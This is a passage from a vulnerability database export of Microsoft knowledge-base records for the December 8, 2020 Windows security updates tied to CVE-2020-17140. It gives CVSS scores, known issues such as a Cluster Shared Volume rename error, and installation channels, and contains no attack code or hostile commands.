Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592495>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4592495](<https://download.microsoft.com/download/8/b/7/8b77686d-a973-44ac-a9c2-6befa7c874a4/4592495.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592495 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592495", "href": "https://support.microsoft.com/en-us/help/4592495", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:38", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592497>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592497](<https://download.microsoft.com/download/2/4/5/245216d1-63c7-40b2-ab27-94e0e7be4bc8/4592497.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592497 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592497", "href": "https://support.microsoft.com/en-us/help/4592497", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:30", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**UPDATED 12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1803 update history home page.\n\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n## Highlights\n\n * Updates to improve security when using Microsoft Edge Legacy.\n * Updates to improve security when using Microsoft Office products.\n * Updates an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n * Security updates to Microsoft Edge Legacy, the Microsoft Graphics Component, Windows Media, Windows Fundamentals, and Windows Virtualization.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4580398) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592446>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592446](<https://download.microsoft.com/download/8/5/5/85523697-c83a-482e-ba5f-36ecbf32bbc5/4592446.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592446 (OS Build 17134.1902) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592446", "href": "https://support.microsoft.com/en-us/help/4592446", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:39", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics, Windows Peripherals, Windows Storage and Filesystems, and Windows File Server and Clustering.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website. \n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the _latest_ SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592503>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592503](<https://download.microsoft.com/download/6/a/9/6a9abff1-e04b-45dd-970c-bac930fa86f0/4592503.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592503 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592503", "href": "https://support.microsoft.com/en-us/help/4592503", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:00", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586845](<https://support.microsoft.com/help/4586845>) (released November 10, 2020) and addresses the following issues:\n\n * Addresses an issue in which PDF24 Creator version 9.1.1 cannot open .txt files.\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592484>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4592484](<https://download.microsoft.com/download/d/c/f/dcf120c1-0eb2-4b07-976d-75c1ccb3efcc/4592484.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592484 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592484", "href": "https://support.microsoft.com/en-us/help/4592484", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:05:59", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**UPDATED 12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n * Security updates to the Microsoft Graphics Component and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends that you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4565911) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592464>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592464](<https://download.microsoft.com/download/6/6/5/665e19b3-ba77-4a37-aa12-0fb46cc45ced/4592464.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592464 (OS Build 10240.18782) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592464", "href": "https://support.microsoft.com/en-us/help/4592464", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:05:59", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586834](<https://support.microsoft.com/help/4586834>) (released November 10, 2020) and addresses the following issues:\n\n * Addresses an issue in which PDF24 Creator version 9.1.1 cannot open .txt files.\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on 